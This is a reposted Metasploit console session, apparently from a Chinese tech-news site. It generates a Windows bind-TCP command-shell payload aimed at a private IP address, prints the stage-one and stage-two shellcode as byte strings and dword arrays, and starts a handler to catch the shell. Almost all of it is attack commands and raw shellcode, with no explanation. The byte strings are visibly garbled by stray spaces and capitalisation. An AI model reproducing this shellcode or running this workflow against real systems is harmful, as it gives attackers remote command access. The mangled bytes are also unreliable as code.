Shulou(Shulou.com)06/01 Report--

Root@localhost:~# msfconsol

Msf > show # ask for help

Msf > use windows/shell/bind_tcp#

Msf payload (bind_tcp) > set RHOST 192.168.48.100

RHOST = > 192.168.48.100

Msf payload (bind_tcp) > generate-tc

# windows/shell/bind_tcp-298 bytes (stage 1)

# http://www.metasploit.com

# VERBOSE=false, LPORT=4444, RHOST=192.168.48.100

# EnableStageEncoding=false, PrependMigrate=false

# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=

Buf =

"\ xfc\ xe8\ x89\ x00\ x00\ x60\ x89\ xe5\ x31\ xd2\ x64\ x8b\ x52" +

"\ x30\ x8b\ x52\ x0c\ x8b\ x52\ x14\ x8b\ x72\ x28\ x0f\ xb7\ x4a\ x26" +

"\ x31\ xff\ x31\ xc0\ xac\ X3c\ x61\ x7c\ x02\ x2c\ x20\ xc1\ xcf\ x0d" +

"\ X01\ xc7\ xe2\ xf0\ x52\ x57\ x8b\ x52\ x10\ x8b\ x42\ X3c\ X01\ xd0" +

"\ x8b\ x40\ x78\ x85\ xc0\ x74\ x4a\ X01\ xd0\ x50\ x8b\ x48\ x18\ x8b" +

"\ x58\ x20\ X01\ xd3\ xe3\ x3c\ x49\ x8b\ x34\ x8b\ X01\ xd6\ x31\ xff" +

"\ x31\ xc0\ xac\ xc1\ xcf\ X0d\ X01\ xc7\ x38\ xe0\ x75\ xf4\ x03\ x7d" +

"\ xf8\ x3b\ x7d\ x24\ x75\ xe2\ x58\ x8b\ x58\ x24\ X01\ xd3\ x66\ x8b" +

"\ x0c\ x4b\ x8b\ x58\ x1c\ X01\ xd3\ x8b\ x04\ x8b\ X01\ xd0\ x89\ x44" +

"\ x24\ x24\ x5b\ x5b\ x61\ x59\ x5a\ x51\ xff\ xe0\ x58\ x5f\ x5a\ x8b" +

"\ x12\ xeb\ x86\ x5d\ x68\ x33\ x32\ x00\ x00\ x68\ x77\ x73\ x32\ x5f" +

"\ x54\ x68\ x4c\ x77\ x26\ x07\ xff\ xd5\ xb8\ x90\ X01\ x00\ x00\ x29" +

"\ xc4\ x54\ x50\ x68\ x29\ x80\ x6b\ x00\ xff\ xd5\ x50\ x50" +

"\ x40\ x50\ x40\ x50\ x68\ xea\ x0f\ xdf\ xe0\ xff\ xd5\ x97\ x31\ xdb" +

"\ x53\ x68\ x02\ x00\ x11\ x5c\ x89\ xe6\ x6a\ x10\ x56\ x57\ x68\ xc2" +

"\ xdb\ x37\ x67\ xff\ xd5\ x53\ x57\ x68\ xb7\ xe9\ x38\ xff\ xff\ xd5" +

"\ x53\ x53\ x57\ x68\ x74\ xec\ x3b\ xe1\ xff\ xd5\ x57\ x97\ x68\ x75" +

"\ x6e\ x4d\ x61\ xff\ xd5\ x6a\ x00\ x6a\ x04\ x56\ x57\ x68\ x02\ xd9" +

"\ xc8\ x5f\ xff\ xd5\ x8b\ x36\ x6a\ x40\ x68\ x00\ x10\ x00\ x00\ x56" +

"\ x6a\ x00\ x68\ x58\ xa4\ x53\ xe5\ xff\ xd5\ x93\ x53\ x6a\ x00\ x56" +

"\ x53\ x57\ x68\ x02\ xd9\ xc8\ x5f\ xff\ xd5\ X01\ xc3\ x29\ xc6\ x85" +

"\ xf6\ x75\ xec\ xc3"

# windows/shell/bind_tcp-240 bytes (stage 2)

# http://www.metasploit.com

Buf =

"\ xfc\ xe8\ x89\ x00\ x00\ x60\ x89\ xe5\ x31\ xd2\ x64\ x8b\ x52" +

"\ x30\ x8b\ x52\ x0c\ x8b\ x52\ x14\ x8b\ x72\ x28\ x0f\ xb7\ x4a\ x26" +

"\ x31\ xff\ x31\ xc0\ xac\ X3c\ x61\ x7c\ x02\ x2c\ x20\ xc1\ xcf\ x0d" +

"\ X01\ xc7\ xe2\ xf0\ x52\ x57\ x8b\ x52\ x10\ x8b\ x42\ X3c\ X01\ xd0" +

"\ x8b\ x40\ x78\ x85\ xc0\ x74\ x4a\ X01\ xd0\ x50\ x8b\ x48\ x18\ x8b" +

"\ x58\ x20\ X01\ xd3\ xe3\ x3c\ x49\ x8b\ x34\ x8b\ X01\ xd6\ x31\ xff" +

"\ x31\ xc0\ xac\ xc1\ xcf\ X0d\ X01\ xc7\ x38\ xe0\ x75\ xf4\ x03\ x7d" +

"\ xf8\ x3b\ x7d\ x24\ x75\ xe2\ x58\ x8b\ x58\ x24\ X01\ xd3\ x66\ x8b" +

"\ x0c\ x4b\ x8b\ x58\ x1c\ X01\ xd3\ x8b\ x04\ x8b\ X01\ xd0\ x89\ x44" +

"\ x24\ x24\ x5b\ x5b\ x61\ x59\ x5a\ x51\ xff\ xe0\ x58\ x5f\ x5a\ x8b" +

"\ x12\ xeb\ x86\ x5d\ x68\ x63\ x6d\ x64\ x00\ x89\ xe3\ x57\ x57\ x57" +

"\ x31\ xf6\ x6a\ x12\ x59\ x56\ xe2\ xfd\ x66\ xc7\ x44\ x24\ x3c\ X01" +

"\ x01\ x8d\ x44\ x24\ x10\ xc6\ x00\ x44\ x54\ x50\ x56\ x56\ x46" +

"\ x56\ x4e\ x56\ x56\ x53\ x56\ x68\ x79\ xcc\ x3f\ x86\ xff\ xd5\ x89" +

"\ xe0\ x4e\ x56\ x46\ xff\ x30\ x68\ x08\ x87\ x1d\ x60\ xff\ xd5\ xbb" +

"\ xf0\ xb5\ xa2\ x56\ x68\ xa6\ x95\ xbd\ x9d\ xff\ xd5\ X3c\ x06\ x7c" +

"\ x0a\ x80\ xfb\ xe0\ x75\ x05\ xbb\ x47\ x13\ x72\ x6f\ x6a\ x00\ x53" +

"\ xff\ xd5"

Msf payload (bind_tcp) > generate-t dword

/ / windows/shell/bind_tcp-298 bytes (stage 1)

/ / http://www.metasploit.com

/ / VERBOSE=false, LPORT=4444, RHOST=192.168.48.100

/ / EnableStageEncoding=false, PrependMigrate=false

/ / EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=

0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31

0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0

0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038

0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489

0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x00323368, 0x73776800, 0x68545f32, 0x0726774c

0x90b8d5ff, 0x29000001, 0x685054c4, 0x006b8029, 0x5050d5ff, 0x50405050, 0xea685040, 0xffe0df0f

0xdb3197d5, 0x00026853, 0xe6895c11, 0x5756106a, 0x37dbc268, 0x53d5ff67, 0xe9b76857, 0xd5ffff38

0x68575353, 0xe13bec74, 0x9757d5ff, 0x4d6e7568, 0x6ad5ff61, 0x56046a00, 0xd9026857, 0xd5ff5fc8

0x406a368b, 0x00100068, 0x006a5600, 0x53a45868, 0x93d5ffe5, 0x56006a53, 0x02685753, 0xff5fc8d9

0x29c301d5, 0x75f685c6, 0x0000c3ec

/ / windows/shell/bind_tcp-240bytes (stage 2)

/ / http://www.metasploit.com

0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31

0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0

0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038

0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489

0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x646d6368, 0x57e38900, 0xf6315757, 0x5659126a

0xc766fde2, 0x013c2444, 0x24448d01, 0x4400c610, 0x56565054, 0x4e564656, 0x56535656, 0x3fcc7968

0x89d5ff86, 0x46564ee0, 0x086830ff, 0xff601d87, 0xb5f0bbd5, 0xa66856a2, 0xff9dbd95, 0x7c063cd5

0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300

Msf payload (bind_tcp) >

Msf payload (bind_tcp) > use exploit/multi/handler# snooping

Msf exploit (handler) > set payload windows/shell/bind_tcp# set load

Payload = > windows/shell/bind_tcp

Msf exploit (handler) > run

[*] Starting the payload handler...

[*] Started bind handler

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.